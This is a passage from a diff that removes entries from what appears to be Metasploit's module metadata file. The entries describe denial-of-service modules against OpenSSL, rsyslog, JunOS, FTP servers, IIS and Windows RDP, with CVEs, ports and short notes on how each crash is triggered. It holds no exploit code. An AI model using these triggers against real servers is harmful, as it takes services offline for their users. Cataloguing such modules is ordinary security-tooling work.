OpenSSL crashes under these versions when it receives a\n ChangeCipherspec Datagram before a ClientHello.", - "references": [ - "CVE-2009-1386", - "OSVDB-55073" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb", - "is_install_path": true, - "ref_name": "dos/ssl/dtls_changecipherspec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ssl/dtls_fragment_overflow": { - "name": "OpenSSL DTLS Fragment Buffer Overflow DoS", - "fullname": "auxiliary/dos/ssl/dtls_fragment_overflow", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-06-05", - "type": "auxiliary", - "author": [ - "Juri Aedla ", - "Jon Hart " - ], - "description": "This module performs a Denial of Service Attack against Datagram TLS in\n OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h.\n This occurs when a DTLS ClientHello message has multiple fragments and the\n fragment lengths of later fragments are larger than that of the first, a\n buffer overflow occurs, causing a DoS.", - "references": [ - "CVE-2014-0195", - "ZDI-14-173", - "BID-67900", - "URL-http://web.archive.org/web/20150815024234/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/ZDI-14-173-CVE-2014-0195-OpenSSL-DTLS-Fragment-Out-of-Bounds/ba-p/6501002", - "URL-http://web.archive.org/web/20140707160621/http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Once-Bled-Twice-Shy-OpenSSL-CVE-2014-0195/ba-p/6501048" - ], - "platform": "", - "arch": "", - "rport": 4433, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/dos/ssl/dtls_fragment_overflow.rb", - "is_install_path": true, - "ref_name": 
"dos/ssl/dtls_fragment_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/ssl/openssl_aesni": { - "name": "OpenSSL TLS 1.1 and 1.2 AES-NI DoS", - "fullname": "auxiliary/dos/ssl/openssl_aesni", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-02-05", - "type": "auxiliary", - "author": [ - "Wolfgang Ettlinger " - ], - "description": "The AES-NI implementation of OpenSSL 1.0.1c does not properly compute the\n length of an encrypted message when used with a TLS version 1.1 or above. This\n leads to an integer underflow which can cause a DoS. The vulnerable function\n aesni_cbc_hmac_sha1_cipher is only included in the 64-bit versions of OpenSSL.\n This module has been tested successfully on Ubuntu 12.04 (64-bit) with the default\n OpenSSL 1.0.1c package.", - "references": [ - "CVE-2012-2686", - "URL-https://www.openssl.org/news/secadv/20130205.txt" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/ssl/openssl_aesni.rb", - "is_install_path": true, - "ref_name": "dos/ssl/openssl_aesni", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/syslog/rsyslog_long_tag": { - "name": "rsyslog Long Tag Off-By-Two DoS", - "fullname": "auxiliary/dos/syslog/rsyslog_long_tag", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-09-01", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module triggers an off-by-two overflow in the\n rsyslog daemon. This flaw is unlikely to yield code execution\n but is effective at shutting down a remote log daemon. 
This bug\n was introduced in version 4.6.0 and corrected in 4.6.8/5.8.5.\n Compiler differences may prevent this bug from causing any\n noticeable result on many systems (RHEL6 is affected).", - "references": [ - "CVE-2011-3200", - "URL-https://www.rsyslog.com/potential-dos-with-malformed-tag/", - "URL-https://bugzilla.redhat.com/show_bug.cgi?id=727644" - ], - "platform": "", - "arch": "", - "rport": 514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb", - "is_install_path": true, - "ref_name": "dos/syslog/rsyslog_long_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/tcp/claymore_dos": { - "name": "Claymore Dual GPU Miner Format String dos attack", - "fullname": "auxiliary/dos/tcp/claymore_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2018-02-06", - "type": "auxiliary", - "author": [ - "res1n", - "bluebird" - ], - "description": "Claymore’s Dual GPU Miner 10.5 and below is vulnerable to a format strings vulnerability. 
This allows an\n unauthenticated attacker to read memory addresses, or immediately terminate the mining process causing\n a denial of service.", - "references": [ - "CVE-2018-6317", - "EDB-43972", - "URL-https://github.com/nanopool/Claymore-Dual-Miner" - ], - "platform": "", - "arch": "", - "rport": 3333, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-05-17 17:04:49 +0000", - "path": "/modules/auxiliary/dos/tcp/claymore_dos.py", - "is_install_path": true, - "ref_name": "dos/tcp/claymore_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/tcp/junos_tcp_opt": { - "name": "Juniper JunOS Malformed TCP Option", - "fullname": "auxiliary/dos/tcp/junos_tcp_opt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "todb " - ], - "description": "This module exploits a denial of service vulnerability\n in Juniper Network's JunOS router operating system. 
By sending a TCP\n packet with TCP option 101 set, an attacker can cause an affected\n router to reboot.", - "references": [ - "BID-37670", - "OSVDB-61538", - "URL-http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/tcp/junos_tcp_opt.rb", - "is_install_path": true, - "ref_name": "dos/tcp/junos_tcp_opt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/tcp/synflood": { - "name": "TCP SYN Flooder", - "fullname": "auxiliary/dos/tcp/synflood", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "A simple TCP SYN flooder", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/dos/tcp/synflood.rb", - "is_install_path": true, - "ref_name": "dos/tcp/synflood", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/upnp/miniupnpd_dos": { - "name": "MiniUPnPd 1.4 Denial of Service (DoS) Exploit", - "fullname": "auxiliary/dos/upnp/miniupnpd_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-03-27", - "type": "auxiliary", - "author": [ - "hdm ", - "Dejan Lukan" - ], - "description": "This module allows remote attackers to cause a denial of service (DoS)\n in MiniUPnP 1.0 server via a specifically crafted UDP request.", - "references": [ - "CVE-2013-0229", - "OSVDB-89625", - "BID-57607", - 
"URL-https://www.rapid7.com/blog/post/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play/", - "URL-https://www.hdm.io/writing/SecurityFlawsUPnP.pdf" - ], - "platform": "", - "arch": "", - "rport": 1900, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-12-04 17:41:24 +0000", - "path": "/modules/auxiliary/dos/upnp/miniupnpd_dos.rb", - "is_install_path": true, - "ref_name": "dos/upnp/miniupnpd_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/appian/appian_bpm": { - "name": "Appian Enterprise Business Suite 5.6 SP1 DoS", - "fullname": "auxiliary/dos/windows/appian/appian_bpm", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-17", - "type": "auxiliary", - "author": [ - "guiness.stout " - ], - "description": "This module exploits a denial of service flaw in the Appian\n Enterprise Business Suite service.", - "references": [ - "CVE-2007-6509", - "OSVDB-39500", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2007-12/0440.html" - ], - "platform": "", - "arch": "", - "rport": 5400, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/appian/appian_bpm.rb", - "is_install_path": true, - "ref_name": "dos/windows/appian/appian_bpm", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/browser/ms09_065_eot_integer": { - "name": "Microsoft Windows EOT Font Table Directory Integer Overflow", - "fullname": "auxiliary/dos/windows/browser/ms09_065_eot_integer", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-11-10", - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module exploits an integer 
overflow flaw in the Microsoft Windows Embedded\n OpenType font parsing code located in win32k.sys. Since the kernel itself parses\n embedded web fonts, it is possible to trigger a BSoD from a normal web page when\n viewed with Internet Explorer.", - "references": [ - "CVE-2009-2514", - "MSB-MS09-065", - "OSVDB-59869" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb", - "is_install_path": true, - "ref_name": "dos/windows/browser/ms09_065_eot_integer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_dos/windows/ftp/filezilla_admin_user": { - "name": "FileZilla FTP Server Admin Interface Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/filezilla_admin_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-11-07", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server Administration Interface in versions 0.9.4d and earlier.\n By sending a procession of excessively long USER commands to the FTP\n Server, the Administration Interface (FileZilla Server Interface.exe)\n when running, will overwrite the stack with our string and generate an\n exception. 
The FileZilla FTP Server itself will continue functioning.", - "references": [ - "BID-15346", - "CVE-2005-3589", - "EDB-1336", - "OSVDB-20817" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/filezilla_admin_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/filezilla_server_port": { - "name": "FileZilla FTP Server Malformed PORT Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/filezilla_server_port", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-12-11", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module triggers a Denial of Service condition in the FileZilla FTP\n Server versions 0.9.21 and earlier. 
By sending a malformed PORT command\n then LIST command, the server attempts to write to a NULL pointer.", - "references": [ - "BID-21542", - "BID-21549", - "CVE-2006-6565", - "EDB-2914", - "OSVDB-34435" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/filezilla_server_port", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/guildftp_cwdlist": { - "name": "Guild FTPd 0.999.8.11/0.999.14 Heap Corruption", - "fullname": "auxiliary/dos/windows/ftp/guildftp_cwdlist", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-12", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable\n to heap corruption. 
You need to have a valid login\n so you can run CWD and LIST.", - "references": [ - "CVE-2008-4572", - "OSVDB-49045", - "EDB-6738" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/guildftp_cwdlist.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/guildftp_cwdlist", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/iis75_ftpd_iac_bof": { - "name": "Microsoft IIS FTP Server Encoded Response Overflow Trigger", - "fullname": "auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-12-21", - "type": "auxiliary", - "author": [ - "Matthew Bergin", - "jduck " - ], - "description": "This module triggers a heap overflow when processing a specially crafted\n FTP request containing Telnet IAC (0xff) bytes. 
When constructing the response,\n the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes.\n\n This issue can be triggered pre-auth and may in fact be exploitable for\n remote code execution.", - "references": [ - "CVE-2010-3972", - "OSVDB-70167", - "BID-45542", - "MSB-MS11-004", - "EDB-15803", - "URL-https://msrc-blog.microsoft.com/2010/12/22/assessing-an-iis-ftp-7-5-unauthenticated-denial-of-service-vulnerability/" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/iis75_ftpd_iac_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/iis_list_exhaustion": { - "name": "Microsoft IIS FTP Server LIST Stack Exhaustion", - "fullname": "auxiliary/dos/windows/ftp/iis_list_exhaustion", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-09-03", - "type": "auxiliary", - "author": [ - "Kingcope", - "Myo Soe" - ], - "description": "This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. 
If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.", - "references": [ - "CVE-2009-2521", - "BID-36273", - "OSVDB-57753", - "MSB-MS09-053", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/iis_list_exhaustion", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/solarftp_user": { - "name": "Solar FTP Server Malformed USER Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/solarftp_user", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-02-22", - "type": "auxiliary", - "author": [ - "x000 <3d3n@hotmail.com.br>", - "C4SS!0 G0M3S ", - "sinn3r " - ], - "description": "This module will send a format string as USER to Solar FTP, causing a\n READ violation in function \"__output_1()\" found in \"sfsservice.exe\"\n while trying to calculate the length of the string. 
This vulnerability\n affects versions 2.1.1 and earlier.", - "references": [ - "EDB-16204" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/solarftp_user.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/solarftp_user", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/titan626_site": { - "name": "Titan FTP Server 6.26.630 SITE WHO DoS", - "fullname": "auxiliary/dos/windows/ftp/titan626_site", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-14", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The Titan FTP server v6.26 build 630 can be DoS'd by\n issuing \"SITE WHO\". You need a valid login so you\n can send this command.", - "references": [ - "CVE-2008-6082", - "OSVDB-49177", - "EDB-6753" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/titan626_site.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/titan626_site", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/vicftps50_list": { - "name": "Victory FTP Server 5.0 LIST DoS", - "fullname": "auxiliary/dos/windows/ftp/vicftps50_list", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-24", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The Victory FTP Server v5.0 can be brought down by sending\n a very simple LIST command", - "references": [ - "CVE-2008-2031", - 
"CVE-2008-6829", - "OSVDB-44608", - "EDB-6834" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/vicftps50_list.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/vicftps50_list", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/winftp230_nlst": { - "name": "WinFTP 2.3.0 NLST Denial of Service", - "fullname": "auxiliary/dos/windows/ftp/winftp230_nlst", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-09-26", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "This module is a very rough port of Julien Bedard's\n PoC. You need a valid login, but even anonymous can\n do it if it has permission to call NLST.", - "references": [ - "CVE-2008-5666", - "OSVDB-49043", - "EDB-6581" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/winftp230_nlst", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/xmeasy560_nlst": { - "name": "XM Easy Personal FTP Server 5.6.0 NLST DoS", - "fullname": "auxiliary/dos/windows/ftp/xmeasy560_nlst", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-13", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "This module is a port of shinnai's script. 
You need\n a valid login, but even anonymous can do it as long\n as it has permission to call NLST.", - "references": [ - "CVE-2008-5626", - "OSVDB-50837", - "EDB-6741" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/xmeasy560_nlst.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/xmeasy560_nlst", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/ftp/xmeasy570_nlst": { - "name": "XM Easy Personal FTP Server 5.7.0 NLST DoS", - "fullname": "auxiliary/dos/windows/ftp/xmeasy570_nlst", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-03-27", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "You need a valid login to DoS this FTP server, but\n even anonymous can do it as long as it has permission\n to call NLST.", - "references": [ - "CVE-2008-5626", - "OSVDB-50837", - "EDB-8294" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [ - 21, - 2121 - ], - "autofilter_services": [ - "ftp" - ], - "targets": null, - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/auxiliary/dos/windows/ftp/xmeasy570_nlst.rb", - "is_install_path": true, - "ref_name": "dos/windows/ftp/xmeasy570_nlst", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/games/kaillera": { - "name": "Kaillera 0.86 Server Denial of Service", - "fullname": "auxiliary/dos/windows/games/kaillera", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-07-02", - "type": "auxiliary", - "author": [ - "Sil3nt_Dre4m" - ], - "description": "The Kaillera 0.86 server can be shut down by 
sending any malformed packet\n after the initial \"hello\" packet.", - "references": [], - "platform": "", - "arch": "", - "rport": 27888, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/games/kaillera.rb", - "is_install_path": true, - "ref_name": "dos/windows/games/kaillera", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166": { - "name": "Windows IIS HTTP Protocol Stack DOS", - "fullname": "auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-05-11", - "type": "auxiliary", - "author": [ - "Max", - "Stefan Blair", - "Axel Souchet", - "Maurice LAMBERT " - ], - "description": "This module exploits CVE-2021-31166, a UAF bug in http.sys\n when parsing specially crafted Accept-Encoding headers\n that was patched by Microsoft in May 2021, on vulnerable\n IIS servers. 
Successful exploitation will result in\n the target computer BSOD'ing before subsequently rebooting.\n Note that the target IIS server may or may not come back up,\n this depends on the target's settings as to whether IIS\n is configured to start on reboot.", - "references": [ - "CVE-2021-31166", - "URL-https://nvd.nist.gov/vuln/detail/CVE-2021-31166", - "URL-https://github.com/mauricelambert/CVE-2021-31166", - "URL-https://twitter.com/metr0/status/1392631376592076805", - "URL-https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-10-01 17:54:59 +0000", - "path": "/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb", - "is_install_path": true, - "ref_name": "dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "screen-effects" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/http/ms10_065_ii6_asp_dos": { - "name": "Microsoft IIS 6.0 ASP Stack Exhaustion Denial of Service", - "fullname": "auxiliary/dos/windows/http/ms10_065_ii6_asp_dos", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-09-14", - "type": "auxiliary", - "author": [ - "Heyder Andrade ", - "Leandro Oliveira " - ], - "description": "The vulnerability allows remote unauthenticated attackers to force the IIS server\n to become unresponsive until the IIS service is restarted manually by the administrator.\n Required is that Active Server Pages are hosted by the IIS and that an ASP script reads\n out a Post Form value.", - "references": [ - 
"CVE-2010-1899", - "OSVDB-67978", - "MSB-MS10-065", - "EDB-15167" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/http/ms10_065_ii6_asp_dos.rb", - "is_install_path": true, - "ref_name": "dos/windows/http/ms10_065_ii6_asp_dos", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/http/pi3web_isapi": { - "name": "Pi3Web ISAPI DoS", - "fullname": "auxiliary/dos/windows/http/pi3web_isapi", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-11-13", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "The Pi3Web HTTP server crashes when a request is made for an invalid DLL\n file in /isapi for versions 2.0.13 and earlier. By default, the non-DLLs\n in this directory after installation are users.txt, install.daf and\n readme.daf.", - "references": [ - "CVE-2008-6938", - "OSVDB-49998", - "EDB-7109" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/http/pi3web_isapi.rb", - "is_install_path": true, - "ref_name": "dos/windows/http/pi3web_isapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/llmnr/ms11_030_dnsapi": { - "name": "Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS", - "fullname": "auxiliary/dos/windows/llmnr/ms11_030_dnsapi", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-04-12", - "type": "auxiliary", - "author": [ - "jduck " - ], - 
"description": "This module exploits a buffer underrun vulnerability in Microsoft's DNSAPI.dll\n as distributed with Windows Vista and later without KB2509553. By sending a\n specially crafted LLMNR query, containing a leading '.' character, an attacker\n can trigger stack exhaustion or potentially cause stack memory corruption.\n\n Although this vulnerability may lead to code execution, it has not been proven\n to be possible at the time of this writing.\n\n NOTE: In some circumstances, a '.' may be found before the top of the stack is\n reached. In these cases, this module may not be able to cause a crash.", - "references": [ - "CVE-2011-0657", - "OSVDB-71780", - "MSB-MS11-030" - ], - "platform": "", - "arch": "", - "rport": 5355, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb", - "is_install_path": true, - "ref_name": "dos/windows/llmnr/ms11_030_dnsapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/nat/nat_helper": { - "name": "Microsoft Windows NAT Helper Denial of Service", - "fullname": "auxiliary/dos/windows/nat/nat_helper", - "aliases": [], - "rank": 300, - "disclosure_date": "2006-10-26", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a denial of service vulnerability\n within the Internet Connection Sharing service in\n Windows XP.", - "references": [ - "OSVDB-30096", - "BID-20804", - "CVE-2006-5614" - ], - "platform": "", - "arch": "", - "rport": 53, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/dos/windows/nat/nat_helper.rb", - "is_install_path": true, - "ref_name": "dos/windows/nat/nat_helper", - "check": false, - "post_auth": false, - 
"default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_dos/windows/rdp/ms12_020_maxchannelids": { - "name": "MS12-020 Microsoft Remote Desktop Use-After-Free DoS", - "fullname": "auxiliary/dos/windows/rdp/ms12_020_maxchannelids", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-16", - "type": "auxiliary", - "author": [ - "Luigi Auriemma", - "Daniel Godas-Lopez", - "Alex Ionescu", - "jduck ", - "#ms12-020" - ], - "description": "This module exploits the MS12-020 RDP vulnerability originally discovered and\n reported by Luigi Auriemma. The flaw can be found in the way the T.125\n ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result\n an invalid pointer being used, therefore causing a denial-of-service condition.", - "references": [ - "CVE-2012-0002", - "MSB-MS12-020", - "URL-http://www.privatepaste.com/ffe875e04a", - "URL-http://web.archive.org/web/20161020044803/http://pastie.org/private/4egcqt9nucxnsiksudy5dw", - "URL-http://web.archive.org/web/20160627131634/http://pastie.org/private/feg8du0e9kfagng4rrg", - 